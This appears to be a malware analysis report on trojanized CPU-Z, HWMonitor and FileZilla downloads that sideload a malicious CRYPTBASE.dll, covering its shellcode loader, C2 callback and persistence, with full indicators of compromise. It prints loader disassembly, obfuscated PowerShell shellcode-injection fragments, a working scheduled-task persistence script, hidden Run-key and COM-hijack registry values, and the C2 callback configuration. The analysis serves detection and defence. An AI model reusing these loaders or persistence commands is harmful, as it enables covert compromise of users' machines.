cpuz_x64.exe (main thread)
    │
    ├──→ LoadLibrary("CRYPTBASE.dll")
    │        │
    │        ├── DllMain(DLL_PROCESS_ATTACH)
    │        │     ├── CreateThread → Thread1 (Orchestrator)
    │        │     │     ├── SuspendThread(main_thread)  ← FREEZE CPU-Z
    │        │     │     ├── CreateThread → Thread2 (Payload)
    │        │     │     │     ├── Decode .rdata payload (357 KB)
    │        │     │     │     ├── Execute shellcode
    │        │     │     │     └── Reflective load out.dll
    │        │     │     ├── Wait for Thread2
    │        │     │     └── ResumeThread(main_thread)   ← UNFREEZE CPU-Z
    │        │     └── LoadRealDll("C:\Windows\System32\CRYPTBASE.dll")
    │        │
    │        └── Returns TRUE
    │
    └──→ CPU-Z continues normally (all SystemFunction* calls forwarded)

4.3.3 Function Proxy Mechanism

The DLL exports the same 12 SystemFunction* functions as the legitimate CRYPTBASE.dll. Each export uses a lazy-loading proxy pattern:

SystemFunction001 (0x29e4):         ; Export ordinal 2
    xor  ecx, ecx                   ; index = 0
    call ResolveForward              ; Get real function address
    test rax, rax
    je   .fail
    jmp  rax                         ; TAIL CALL to real function

SystemFunction002 (0x2a83):
    push 1                           ; index = 1
    pop  rcx
    call ResolveForward
    ...jmp rax

SystemFunction003 (0x2ad1):
    push 2                           ; index = 2
    pop  rcx
    call ResolveForward
    ...jmp rax

ResolveForward (0x2a31) - lazy resolver:

ResolveForward:
    ; Check cache: function_cache[index]
    lea  rdi, [rip+0x1f8100]        ; Cache array base
    mov  rax, [rdi + rcx*8]          ; Check if already resolved
    test rax, rax
    jne  .cached                     ; Already resolved, return it

    ; First call: resolve from real DLL
    call LoadRealDll                 ; Ensure real CRYPTBASE.dll loaded
    mov  rcx, [real_dll_handle]      ; HMODULE of real CRYPTBASE.dll

    ; Function name table at 0xeec18 (relative offsets)
    lea  rax, [rip+0xeec18]         ; Name table base
    movsxd rdx, [rax + rsi*4]       ; Get relative offset for this index
    add  rdx, rax                    ; Absolute address of function name string

    call GetProcAddress(real_dll, function_name)
    mov  [rdi + rsi*8], rax          ; Cache the resolved address

.cached:
    ret                              ; RAX = real function address

Function name forwarding table at RVA 0xeec18:

Index	Function Name
0	SystemFunction001
1	SystemFunction002
2	SystemFunction003
3	SystemFunction004
4	SystemFunction005
5	SystemFunction028
6	SystemFunction029
7	SystemFunction034
8	SystemFunction036
9	SystemFunction040
10	SystemFunction041

Real DLL loading: Uses LoadLibraryExA("C:\Windows\System32\CRYPTBASE.dll", NULL, LOAD_LIBRARY_SEARCH_SYSTEM32) with the 0x800 flag to force loading from System32 even though a local DLL exists.

Note on sideloading target: cpuz_x64.exe does NOT directly import CRYPTBASE.dll. The sideloading is transitive — ADVAPI32.dll (which CPU-Z does import directly) has a dependency on CRYPTBASE.dll. When Windows resolves this transitive dependency, it checks the application directory first, finding the malicious DLL.

4.3.4 Embedded C2 Configuration

Two JSON configuration strings are embedded in the .rdata section:

Heartbeat template (at file offset 0xed90f):

{"hello":""}

C2 configuration (at file offset 0xed91d, RVA 0xee71d):

{"tag":"tbs","referrer":"cpz","callback":"https://welcome.supp0v3.com/d/callback"}

Field	Value	Meaning
`tag`	`tbs`	Campaign/build tag (possibly "the backdoor service")
`referrer`	`cpz`	Delivery vector identifier (CPU-Z)
`callback`	`https://welcome.supp0v3.com/d/callback`	C2 callback URL

The tag and referrer fields allow the C2 server to track which campaign and delivery method compromised each victim. The utm_source=CityOfSin parameter seen in sandbox HTTP captures is appended at runtime.

4.3.5 Encoded Shellcode Payload

The .rdata section (1.95 MB) contains an encoded shellcode payload stored as colon-separated hex values in null-terminated chunks:

Encoding format:

[6 hex bytes]:[colon separator]...\x00[6 hex bytes]:....\x00
Example: "0f:b6:42:0b:45:03\x00b6:42:0c:45:03:c1\x00"

Payload statistics:

Total colon characters: 298,804
Colon data span: 2,041,760 bytes (nearly all of .rdata)
Total encoded chunks: ~59,619
Decoded payload size: 357,672 bytes (349.3 KB)
Decoded payload entropy: 7.998 (encrypted)

The .rdata section also contains the DLL path string, function forwarding table, C2 config JSON, and PE metadata interleaved with the encoded payload data.

4.3.6 Reflective PE Loader (out.dll)

When decoded, the payload consists of two components:

1. Shellcode stub (offset 0x00, ~63 bytes):

0000: fc              cld                      ; Clear direction flag
0001: 48 83 e4 f0     and rsp, -0x10           ; Align stack to 16 bytes
0005: e8 00 00 00 00  call $+5                 ; PIC: get current address
000a: 58              pop rax                  ; RAX = address of this instruction
000b: 48 05 29 00 00  add rax, 0x29            ; RAX = &metadata (offset 0x33)
0011: 48 89 c1        mov rcx, rax             ; RCX = &metadata (arg1)
0014: 48 89 c2        mov rdx, rax
0017: 48 81 c2 0c 00  add rdx, 0x0C            ; RDX = &PE_base (offset 0x3F)
001e: 48 89 d3        mov rbx, rdx
0021: 48 81 c3 f4 11  add rbx, 0x11F4          ; RBX = reflective_loader (offset 0x1233)
0028: 48 83 ec 20     sub rsp, 0x20            ; Shadow space
002c: 48 ff d3        call rbx                 ; Call reflective loader

2. Metadata header (offset 0x33, 12 bytes):

Offset	Value	Meaning
0x33	`0x00057E1C` (359,964)	Total payload/image size
0x37	`0x00000002`	Section count or flags
0x3B	`0x00057C00` (359,424)	Raw PE data size

3. Embedded PE "out.dll" (offset 0x3F+):

The MZ header is present at offset 0x40 with standard DOS stub ("This program cannot be run in DOS mode"). The PE contains:

Internal name: out.dll
Architecture: x86-64 (AMD64)
Sections: .text$mn, .idata$5, .rdata, .rdata$voltmd, .xdata, .edata, .idata$2, .idata$3, .pdata
Imports: GetLastError from KERNEL32.dll
Reflective loader entry: at offset 0x1233 within the payload

The reflective loader at offset 0x1233 performs:

Parse the embedded PE headers manually
Allocate memory via VirtualAlloc
Map sections into memory
Process relocations
Resolve imports (KERNEL32.dll)
Execute the PE entry point

The bulk of out.dll is encrypted (entropy 7.998), with decryption performed by the reflective loader before mapping. This is the final stage payload that spawns PowerShell and establishes persistence.

Decoded payload saved locally: samples/decoded_payload.bin (357,672 bytes)

4.3.7 DLL Variant Comparison

Feature	Bundled DLL	Variant DLL
SHA256	`496850188...`	`9cdabd70f...`
Size	2,179,584 (2.08 MB)	1,256,960 (1.20 MB)
Sections	7 (with .buildid, .tls)	5 (no .buildid, .tls)
Imphash	`76ef47c1...`	`7f3aa71d...`
.rdata size	2,041,856	1,196,544
Imports ntdll	NtAllocate/FreeVirtualMemory	NtAllocate/FreeVirtualMemory
Extra imports	AcquireSRWLockExclusive, ResumeThread, RtlWaitOnAddress	MessageBoxA (USER32)
TLS directory	Yes (empty)	No
Error strings	"thread panic:"	"OpenThread failed", "panic:"
Exports	19 (12 functions + 7 TLS-related)	13 (12 functions + _DllMainCRTStartup)
VT Detection	31/77	31/76

The variant is a smaller, slightly earlier build — it lacks TLS support, has fewer exports, includes MessageBoxA (possibly for debug/error display), and has an explicit "OpenThread failed" error string. The bundled version is more refined with TLS support, SRW locks (for thread-safe operation), and the .buildid section.

Both share the same core architecture: Zig-compiled proxy DLL with colon-hex encoded shellcode in .rdata.

4.4 Stage 2 - C2 Callback and Payload Delivery

Verified by sandbox HTTP ordering: The C2 callback is the first network action after the legitimate CPU-Z version check. The DLL's reflective-loaded out.dll performs:

DNS-over-HTTPS resolution: GET https://1.1.1.1/dns-query?name=welcome.supp0v3.com&type=A
C2 callback: POST https://welcome.supp0v3.com/d/callback with campaign config {"tag":"tbs","referrer":"cpz","callback":"..."}
C2 response: 200 OK, Content-Type: application/json, Content-Length: 55 (via 1.1 Caddy backend)
The 55-byte JSON response contains instructions or next-stage code delivery coordinates

The C2 delivers the full backdoor payload to the PowerShell stage. This is confirmed by the file write ordering in CAPE sandbox: no persistence files are written until AFTER the C2 response is received.

4.5 Stage 3 - PowerShell Loader

The DLL spawns PowerShell with a carefully crafted command line that reads code from stdin rather than command-line arguments, evading command-line logging:

powershell.exe -Command "[Console]::In.ReadToEnd() | Invoke-Expression"

The PowerShell code piped via stdin contains heavily obfuscated functions using business-themed variable names as camouflage:

function New-DelegateType {
    # Compliance validation checkpoint
    param(
        [Type[]]$marketManager = @(),
        # Security framework initialization
        [Type]$marketProvider = [Void]
        # Performance monitoring hook
    )
    $customerAgent = [AppDomain]::CurrentDomain
    # Enterprise policy enforcement
    $accountHandler = New-Object System.Reflection.AssemblyName('DynamicDelegate')
    # Audit trail generation
    $customerHandler = $customerAgent.DefineDynamicAssembly(...)
    ...
}

This function creates dynamic .NET delegates at runtime for API calls - a technique for bypassing AMSI and calling native Windows APIs from PowerShell.

A second key function, Invoke-JIT, performs shellcode execution:

function Invoke-JIT {
    param(
        [byte[]]$contentBuffer,
        [int]$customerController = 0,
        [byte[]]$customerProvider = @(0,0,0,0)
    )
    $systemHandle = [NtApi]::GetCurrentProcess()
    [IntPtr]$dataHandle = [IntPtr]::Zero
    [UInt32]$codeSize = [UInt32]$contentBuffer.Length
    $revenueAgent = [NtApi]::NtAllocateVirtualMemory(
        $systemHandle,
        [ref]$dataHandle,
        [UIntPtr]::Zero,
        ...
    )
    ...
}

This allocates executable memory via NtAllocateVirtualMemory and runs shellcode - a classic reflective injection pattern.

4.6 Stage 4 - In-Memory C# Compilation (csc.exe)

The PowerShell stage triggers the .NET C# compiler (csc.exe) to compile code in-memory:

csc.exe /noconfig /fullpaths @"C:\Users\<USER>\AppData\Local\Temp\ktc155gm\ktc155gm.cmdline"

This generates a temporary DLL (ktc155gm.dll) and supporting files, which are then loaded into the PowerShell process. The cvtres.exe resource compiler is also invoked, indicating resource embedding.

MSBuild project files are dropped for persistence:

C:\Users\<USER>\AppData\Local\Microsoft\MSBuild\c_3791.proj - Main persistence project
C:\Users\<USER>\AppData\Local\Packages\MSBuild\CommonBuild.proj - Secondary persistence project

These .proj files contain inline C# tasks that execute malicious code when MSBuild processes them - a well-known Living-off-the-Land Binary (LOLBin) technique.

4.7 Stage 5 - Persistence Mechanisms

The malware establishes four independent persistence mechanisms:

4.7.1 Registry Run Key (MSBuild)

Key:   HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ea36ba52-31af-5d88-c3d633
Value: powershell -WindowStyle hidden -Command C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Users\Bruno\AppData\Local\Microsoft\MSBuild\c_3791.proj

Runs on every user logon. Uses PowerShell in hidden mode to invoke MSBuild with the malicious project file. The Run key name uses a GUID-like random string.

Across sandbox runs, different random key names were observed:

ea36ba52-31af-5d88-c3d633
839dc7dc-0ec0-5294-cff01f
5637d46b-ca04-57c0-7a9858
1d5a637c-f015-550a-7a0c4b
7ffc4070-ca40-54a1-046add

4.7.2 Scheduled Task

$Action = New-ScheduledTaskAction -Execute 'powershell.exe' `
  -Argument '-WindowStyle Hidden -Command "& C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Users\Bruno\AppData\Local\Packages\MSBuild\CommonBuild.proj"'
$PeriodicTrigger = New-ScheduledTaskTrigger -Once -At (Get-Date) `
  -RepetitionInterval (New-TimeSpan -Minutes 68) `
  -RepetitionDuration (New-TimeSpan -Days (365 * 20))
$LogonTrigger = New-ScheduledTaskTrigger -AtLogOn -User $env:USERNAME
$Settings = New-ScheduledTaskSettingsSet -Hidden -AllowStartIfOnBatteries -StartWhenAvailable
$Principal = New-ScheduledTaskPrincipal -UserId $env:USERNAME -LogonType Interactive -RunLevel Highest

Triggers:

Every 68 minutes (unusual interval to avoid pattern detection)
At user logon
Duration: 20 years (effectively permanent)
Runs with Highest privileges, hidden window

4.7.3 COM Hijacking (TypeLib -> ActiveX.sct -> Clippy.sct -> Moniker.dll)

HKCU\Software\Classes\TypeLib\{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}\1.1\0\(Default)
  = script:C:\Users\Bruno\AppData\Local\Microsoft\Internet Explorer\ActiveX.sct

HKCU\Software\Classes\TypeLib\{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}\1.1\0\win64\(Default)
  = script:C:\Users\Bruno\AppData\Local\Microsoft\Internet Explorer\ActiveX.sct

This hijacks the IScriptControl TypeLib GUID to execute a SCT scriptlet (ActiveX.sct) whenever any application attempts to use the IScriptControl COM object.

4.7.4 PowerShell Profile Autorun

Key:   HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\profile
Value: powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\Users\Bruno\AppData\Local\Microsoft\Windows\PowerShell\autorun.ps1

Drops and registers a PowerShell autorun script with execution policy bypass.

4.8 Evasion Techniques

Technique	Detail
DLL Sideloading	Uses legitimate signed CPU-Z binary as host; transitive load via ADVAPI32
Zig-compiled DLL	Uncommon compiler avoids signature-based detection of C/C++ toolchains
Colon-hex encoding	349KB payload encoded as colon-separated hex in .rdata (e.g. `b6:42:0b:45:03:c1`)
Reflective PE loading	out.dll reflective-loaded via Stephen Fewer-style loader with ROR13 API hashing
XXTEA encryption	out.dll's internal payload encrypted with Corrected Block TEA (128-bit key, delta `0x9E3779B9`)
DEFLATE compression	XXTEA-decrypted data further compressed with raw DEFLATE (custom inflate impl in .rdata)
Dual-hash API resolution	Reflective loader uses ROR13; out.dll uses ROR14 -- complicates single-signature detection
Custom DllMain reason code	out.dll only activates on fdwReason=0x0A (canary), ignores normal DLL_PROCESS_ATTACH
Thread suspension	Suspends main CPU-Z thread during injection, resumes after -- avoids race conditions
Stdin piping	PowerShell code delivered via stdin (`[Console]::In.ReadToEnd()`), not command-line args
Business-themed obfuscation	Variables named `$marketManager`, `$customerAgent`, `$revenueAgent`
IPv6-encoded .NET assembly	Moniker.dll encoded as IPv6 address array in Clippy.sct
BinaryFormatter deserialization	.NET assembly loaded via deserialization gadget chain, avoids `Assembly.Load` detection
Anti-debug	Checks for debug environment (DETECT_DEBUG_ENVIRONMENT tag)
Anti-sandbox	BIOS checks, memory checks, long sleeps; Zenbox classified as CLEAN (evasion success)
Self-deletion	Removes traces after execution
DNS-over-HTTPS	Bypasses DNS monitoring for C2 resolution via Cloudflare 1.1.1.1
Cloudflare fronting	C2 behind Cloudflare CDN (shared IPs); backend is Caddy reverse proxy
C2-delivered backdoor	Persistence components not in the DLL -- fetched from C2 at runtime
LOLBins	MSBuild, PowerShell, csc.exe, cvtres.exe, regsvr32.exe, scrobj.dll
XOR-encrypted shellcode	`BuildCache.dat` encrypted with rolling key `1+(i%17)`
In-memory compilation	C# compiled at runtime by csc.exe, loaded as .NET DLL
Proxy DLL exports	Lazy-loading forwarding to real `C:\Windows\System32\CRYPTBASE.dll`
Randomized persistence names	GUID-like registry Run key names change per execution
Multiple persistence paths	4 independent mechanisms -- surviving removal of any single one
Mutex	Unique mutex per instance (`Local\3ecd29ec-86b0-5c3c-40af48`)

5. Command & Control Infrastructure

5.1 C2 Domain

Property	Value
Domain	`supp0v3.com`
Subdomain	`welcome.supp0v3.com`
Registered	2025-10-29
Expires	2026-10-29
Registrar	Privacy-protected (ordertld.com)
Nameservers	`rodney.ns.cloudflare.com`, `emily.ns.cloudflare.com`
VT Detection	10/94 malicious
Categories	Malware, Spyware, Known Infection Source

5.2 DNS-over-HTTPS Resolution

GET https://1.1.1.1/dns-query?name=welcome.supp0v3.com&type=A
Host: 1.1.1.1
Accept: application/dns-json

Uses Cloudflare's public DoH resolver to bypass enterprise DNS monitoring and NIDS.

5.3 C2 Callback Protocol

Endpoint: POST https://welcome.supp0v3.com/d/callback

Response headers (from C2AE sandbox):

Server: cloudflare
via: 1.1 Caddy
Content-Type: application/json
Content-Length: 55
access-control-allow-origin: *
access-control-allow-headers: *
cf-cache-status: DYNAMIC

The via: 1.1 Caddy header reveals the C2 backend uses a Caddy web server behind Cloudflare.

5.4 Infrastructure Details

C2 URL: https://welcome.supp0v3.com/ - 20/95 malicious on VT

IP Address	Purpose	Notes
`104.21.63.112`	C2 (welcome.supp0v3.com)	Cloudflare CDN
`172.67.145.101`	C2 (welcome.supp0v3.com)	Cloudflare CDN
`195.154.81.43`	Legitimate (download.cpuid.com)	Online.net / Scaleway
`1.1.1.1`	DNS-over-HTTPS resolver	Cloudflare DNS
`104.18.20.213`	CRL check (r12.c.lencr.org)	Let's Encrypt
`104.18.21.213`	CRL check (r12.c.lencr.org)	Let's Encrypt
`162.159.36.2`	Cloudflare	DNS/CDN infrastructure
`23.11.33.159`	DigiCert CRL (Akamai)	Certificate validation
`23.200.156.138`	Akamai CDN	Certificate validation
`23.200.156.146`	Akamai CDN	Certificate validation

TLS Certificate (C2):

Subject:  CN=supp0v3.com
Issuer:   CN=WE1, O=Google Trust Services, C=US
Serial:   00c84335271751f130118159ec1cebe9fc
JA3:      3b5074b1b5d032e5620f69f9f700ff0e
JA3S:     466556e923186364e82cbdb4cad8df2c
JA4:      t12d210700_76e208dd3e22_2dae41c691ec

6. Indicators of Compromise (IOCs)

6.1 File Hashes

Primary Package (CPU-Z ZIP)

Property	Value
SHA256	`eff5ece65fb30b21a3ebc1ceb738556b774b452d13e119d5a2bfb489459b4a46`
SHA1	`b3dda9b61f0d7dfadbd23a206cb5d4f06d4eb96b`
MD5	`fed973c1f9ef2461a45e956fbbdf8ea9`
SSDEEP	`98304:towHq8jJTsBta+056pchCmj/9GNbvgpuJz5SBUvnxY0ZG4yf29PRog:nljJjh6mgmjkNiOz5S+vne0INf29PRX`
VT	View

CRYPTBASE.dll Variants (DLL Sideloading Payload)

SHA256	File	Det	VT
`49685018878b9a65ced16730a1842281175476ee5c475f608cadf1cdcc2d9524`	CRYPTBASE.dll (CPU-Z bundled, imphash:`76ef47c1`)	31/77	View
`9cdabd70f50dc8c03f0dfb31894d9d5265134a2cf07656ce8ad540c1790fc984`	CRYPTBASE.dll (variant, imphash:`7f3aa71d`)	31/76	View
`8a6c39f97fb86a4ff9dc9226fa8b3445c5fe123abab532ea6afb9be2608780e1`	CRYPTBASE.dll v1 (early, 2025-12-13)	37/76	View
`b63aa4a754ba2b82811905805822ea7f8c2be44d0d0c12e491237d7f8391ff58`	CRYPTBASE.dll (powerMAX build)	--	View
`aec12d6547e34206a72107c90e68db4e4f2cddee77d95480ec67e0fdd2fd5e7a`	CRYPTBASE.dll (HWMonitor 1.63)	29/77	View
`a6afdcc64e697c013ded61d1e1dff950884ac162323a217e04d1b4d0a24bde07`	CRYPTBASE.dll (HWMonitor 1.63 v2)	23/77	View
`98e0f9c8f5342c1924b30e8fc694be0a1c9870fa42a5dde1a2abfb32e8e10ab3`	CRYPTBASE.dll (HWMonitor Pro 1.57)	20/77	View
`cd7385e7efb41f53002710f4efcedb2c05c4c9f7a2d1a53b6c5ab6be2c26d4f5`	CRYPTBASE.dll (PerfMonitor 2)	25/77	View
`0d5578b212c64d91772a85fd7bf42d23bfb7ab0925be5bea6e72e07ba48dc5c8`	CRYPTBASE.dll (CPU-Z "CRYPT" build)	24/77	View
`74b5d631cc6802a5790f99a4bfefd9b3dfcfb43007f9fc576f7dfd4eac69d52e`	CRYPTBASE.dll (MEXC exchange, 34KB)	20/76	View

version.dll Variants (FileZilla DLL Sideloading)

SHA256	File	Det	VT
`e4c6f8ee8c946c6bd7873274e6ed9e41dec97e05890fa99c73f4309b60fd3da4`	version.dll (FileZilla 3.69.5)	50/76	View
`c3f74b948b902cc641da83fe6535133894ed979a73068e4937c633c9a661e3ce`	version.dll (unknown target)	41/76	View

Trojanized ZIP Packages

SHA256	File	Det	VT
`eff5ece65fb30b21a3ebc1ceb738556b774b452d13e119d5a2bfb489459b4a46`	cpu-z_2.19-en.zip	22/77	View
`9932fa8d24b3e9a1e39a722fe6e34e75cdd3feb51fcdab67d636d95b4f068935`	cpu-z_2.19-en.zip (v2)	15/77	View
`cfbd87ba199717d907d8c360587fc4704b7813fd4d2cd3829981076319099fcb`	cpu-z.zip / cpu-z_2.19.zip	15/77	View
`f8b09fa8c015f15e37c0469b01913a24aaf9e1aaac1afa13364e09b96b53c871`	cpu-z_2.19-en.zip (v3)	22/77	View
`3d91f442ddc055e15a7e4e8f7f30da43918ce3e12efad69e31e0e0b66be42a91`	hwmonitor_1.63.zip (trojanized)	15/77	View
`a2bea0e6b5e5500b4a26eeabb4a28a643a25bc13b20e5a4b35ca8e48a2e6d88f`	hwmonitor-pro_1.57.zip	14/77	View
`e0541fb863142ed515f2e76a2f93babc3b9cf3af1b6d12be57f16a665b4f6406`	perfmonitor-2_2.04.zip	14/77	View
`d3bb52e52cb1511da7ee2991a5959004db9e9551280dc80afe90b79ebc5e99c8`	powermax_1.00 (with PDF lure)	14/77	View
`665cca285680df321b63ad5106b167db9169afe30c17d349d80682837edcc755`	FileZilla_3.69.5_win64.zip	38/77	View

Inno Setup Installer (Redirect Payload)

SHA256	File	Det	VT
`eefc0f986dd3ea376a4a54f80ce0dc3e6491165aefdd7d5d6005da3892ce248f`	HWiNFO_Monitor_Setup.exe	33/77	View
`66ad4aaf260a5173d8eaa14db52629fd361add8b772f6a4bcc5c10328f0cc3c0`	HWMonitorPro_1.57_Setup.exe	22/77	View
`58814edae4c0adad75f48092c4c2d312901e8a8b6d6aec5ca724c33ca37a5311`	PerfMonitor2_Setup.exe	15/77	View

C2-Delivered Persistence Components

SHA256	File	Det	VT
`1f7fa30eefeedfdcaaf0eca7d20d866fd48e5d3e75dbe7e47976bac3c097b271`	CommonBuild.proj / c_3791.proj	0/77	View
`0d8d759db6c2012210a07ca825b01f727a3a23d615b8dbb4c241b508b2011448`	ActiveX.sct	0/77	View
`02ff4cf4bea26993e4556706bada73fce98284388c57bad31ceb784c4791a703`	Clippy.sct	0/77	View
`3d805bd27ceb641615b755d26092b13c135e1f3eb9f9758cd9df4bd08ace3d2d`	Moniker.dll (extracted from Clippy.sct)	--	--

BuildCache.dat / data.dat (Final Stage Shellcode)

SHA256	Size	First Seen	Det	VT
`d4ac7b02f1472f4f15a981a2a7ec89e9f35e2e15d9564ad679ac339d0968390e`	760,907 B	2026-04-09	0/77	View
`2fe5443d785667344916f4d4684db0666820cd45b7ed4eb3f2e389600bfd2480`	732,235 B	2026-03-20	0/77	View
`b2c45a026a115e60b5908a1f8474ff4acc6e14a64308996e00d16c7c11665216`	710,731 B	2025-12-07	0/77	View

VBA Macro Component (Phishing Vector)

SHA256	Size	Det	VT
`1c76af3a9097f50384345237140df78e8b456e4165b0270fdc3a1414413dc64e`	14,776 B	8/76	View

.url Exploit Files (Earlier Campaign, Same Infrastructure)

SHA256	File	VT
`715330cdb252f972dd073184baef526ade7bf0bdae00eaf3cd51668618c005dd`	LibreOffice_25.8.4_Win_x86-64.msi.url	View
`cf0d0b2fd29bf959838dc4af0223d47c5db58195b3d9d1c33dedbf75066631b0`	GoogleDriveSetup.url	View

6.2 Network Indicators

Domains

Domain	Type	Description
`supp0v3.com`	C2	Command and control base domain
`welcome.supp0v3.com`	C2	Active C2 callback subdomain (behind Cloudflare)
`helloworld.supp0v3.com`	C2 test	Testing subdomain (behind Cloudflare, first seen 2025-11-17)
`ai.supp0v3.com`	Backend	Real backend -> 147.45.178.61 (NOT Cloudflare)
`pub-45c2577dbd174292a02137c18e7b1b5a.r2.dev`	Distribution	Main Cloudflare R2 malware hosting bucket
`pub-fd67c956bf8548b7b2cc23bb3774ff0c.r2.dev`	Distribution	Secondary R2 bucket
`pub-f3252d8370f34f0d9f3b3c427d3ac33c.r2.dev`	Distribution	Tertiary R2 bucket

URLs

C2 endpoints:

URL	Method	Description
`https://welcome.supp0v3.com/d/callback`	POST	C2 callback endpoint
`https://welcome.supp0v3.com/d/callback?utm_tag=snip&utm_source=CityOfSin`	POST	C2 callback with campaign tracking
`https://1.1.1.1/dns-query?name=welcome.supp0v3.com&type=A`	GET	DoH DNS resolution

Cloudflare R2 malware distribution URLs (redirect targets from compromised cpuid.com):

URL	Product
`https://pub-45c2577dbd174292a02137c18e7b1b5a.r2.dev/cpu-z_2.19-en.zip`	CPU-Z
`https://pub-45c2577dbd174292a02137c18e7b1b5a.r2.dev/hwmonitor_1.63.zip`	HWMonitor
`https://pub-45c2577dbd174292a02137c18e7b1b5a.r2.dev/hwmonitor/HWiNFO_Monitor_Setup.exe`	HWMonitor (Inno Setup)
`https://pub-45c2577dbd174292a02137c18e7b1b5a.r2.dev/hwmonitor-pro/hwmonitor-pro_1.57.zip`	HWMonitor Pro
`https://pub-45c2577dbd174292a02137c18e7b1b5a.r2.dev/hwmonitor-pro/HWMonitorPro_1.57_Setup.exe`	HWMonitor Pro (Inno Setup)
`https://pub-45c2577dbd174292a02137c18e7b1b5a.r2.dev/perfmonitor/perfmonitor-2_2.04.zip`	PerfMonitor 2
`https://pub-45c2577dbd174292a02137c18e7b1b5a.r2.dev/perfmonitor/PerfMonitor2_Setup.exe`	PerfMonitor 2 (Inno Setup)
`https://pub-45c2577dbd174292a02137c18e7b1b5a.r2.dev/powermax/powermax_1.00.zip`	powerMAX
`https://pub-45c2577dbd174292a02137c18e7b1b5a.r2.dev/powermax/powermax.exe`	powerMAX (Inno Setup)
`https://pub-fd67c956bf8548b7b2cc23bb3774ff0c.r2.dev/cpu-z_2.19-en.zip`	CPU-Z (secondary)
`https://pub-fd67c956bf8548b7b2cc23bb3774ff0c.r2.dev/hwmonitor_1.63.zip`	HWMonitor (secondary)
`https://pub-f3252d8370f34f0d9f3b3c427d3ac33c.r2.dev/cpu-z.zip`	CPU-Z (tertiary)
`https://pub-f3252d8370f34f0d9f3b3c427d3ac33c.r2.dev/hwmonitor_1.63.zip`	HWMonitor (tertiary)

Earlier campaign (.url exploit WebDAV):

URL	Target
`file://147.45.178.61@80/file/t10/LibreOffice_25.8.4_Win_x86-64.vbs`	LibreOffice CVE-2023-36025
`file://147.45.178.61@80/file/GoogleDriveSetup.vbs`	Google Drive CVE-2023-36025

IP Addresses (C2-related)

IP	Description
`104.21.63.112`	C2 (Cloudflare CDN for welcome.supp0v3.com)
`172.67.145.101`	C2 (Cloudflare CDN for welcome.supp0v3.com)
`147.45.178.61`	Download/staging server (ai.supp0v3.com) -- AS215540 GCS LLP, Frankfurt DE; WebDAV for .url exploits; fake VK.com TLS cert
`95.216.51.236`	STX RAT C2 server (Hetzner Online GmbH, Finland) -- confirmed by eSentire + our FileZilla DLL contacts this IP

C2 Subdomains (supp0v3.com)

Subdomain	First Seen	IP	Purpose
`ai.supp0v3.com`	2025-10-29	`147.45.178.61`	Development/staging (bare IP)
`helloworld.supp0v3.com`	2025-11-17	`104.21.63.112`	Testing (Cloudflare)
`welcome.supp0v3.com`	2025-12-11	`104.21.63.112`	Production C2 (Cloudflare)
`elcome.supp0v3.com`	2026-04-08	--	Typo/DNS probe

TLS Fingerprints

Type	Value	Context
JA3	`3b5074b1b5d032e5620f69f9f700ff0e`	C2 client TLS fingerprint
JA3S	`466556e923186364e82cbdb4cad8df2c`	C2 server TLS fingerprint
JA4	`t12d210700_76e208dd3e22_2dae41c691ec`	C2 client JA4 fingerprint
JA3	`a0e9f5d64349fb13191bc781f81f42e1`	CPUID.com connection
JA3	`c12f54a3f91dc7bafd92cb59fe009a35`	DoH resolver connection

6.3 Host-Based Indicators

File System Artifacts

Persistence files (C2-delivered):

C:\Users\<USER>\AppData\Local\Microsoft\MSBuild\c_3791.proj                       <- MSBuild C# shellcode loader
C:\Users\<USER>\AppData\Local\Packages\MSBuild\CommonBuild.proj                   <- MSBuild C# shellcode loader (copy)
C:\Users\<USER>\AppData\Local\Microsoft\Internet Explorer\ActiveX.sct             <- COM hijack -> regsvr32 launcher
C:\Users\<USER>\AppData\Local\Microsoft\Internet Explorer\Clippy.sct              <- IPv6-encoded .NET runner
C:\Users\<USER>\AppData\Local\Microsoft\Internet Explorer\data.dat                <- Shellcode payload for Moniker.dll
C:\Users\<USER>\AppData\Local\Microsoft\MSBuild\Current\Cache\BuildCache.dat      <- XOR-encrypted shellcode for .proj
C:\Users\<USER>\AppData\Local\Microsoft\Windows\PowerShell\autorun.ps1            <- PowerShell profile persistence

Runtime artifacts:

C:\Users\<USER>\AppData\Local\Temp\<random>\<random>.0.cs     <- C# source (csc.exe input)
C:\Users\<USER>\AppData\Local\Temp\<random>\<random>.dll      <- Compiled .NET DLL (csc.exe output)
C:\Users\<USER>\AppData\Local\Temp\<random>\<random>.cmdline  <- csc.exe command line args
C:\ProgramData\CPUID Software\cpu-z\KPTwo6rj                  <- Staging/temp file

Browser activity (malware launches Chrome/Chromium):

Process: powershell.exe -> "C:\Program Files\Google\Chrome\Application\chrome.exe"

The malware launches Chrome as a child of the PowerShell process. Chromium files at %LOCALAPPDATA%\Chromium\ (including extension 22ba6405535c46569a07) were read but not written -- these are sandbox pre-existing artifacts, not malware-deployed. The purpose of launching Chrome remains under investigation (possibly for browser-based C2 or cookie/credential access).

Registry Keys

HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\<guid-pattern>
  = powershell -WindowStyle hidden -Command ...MSBuild.exe ...c_3791.proj

HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\profile
  = powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File ...autorun.ps1

HKCU\Software\Classes\TypeLib\{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}\1.1\0\(Default)
  = script:...\ActiveX.sct

HKCU\Software\Classes\TypeLib\{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}\1.1\0\win64\(Default)
  = script:...\ActiveX.sct

Mutexes

Local\3ecd29ec-86b0-5c3c-40af48
Local\b2a6cfa5-0559-5ebf-4f1d24
Local\9daad017-ac2e-5144-677846
Local\970a9b7a-dc59-576e-0aeb59

Services Started

cpuz162
BITS
GoogleChromeElevationService
WSearch

Process Indicators

cpuz_x64.exe -> powershell.exe -Command "[Console]::In.ReadToEnd() | Invoke-Expression"
powershell.exe -> csc.exe /noconfig /fullpaths @"...\<random>.cmdline"
csc.exe -> cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ...
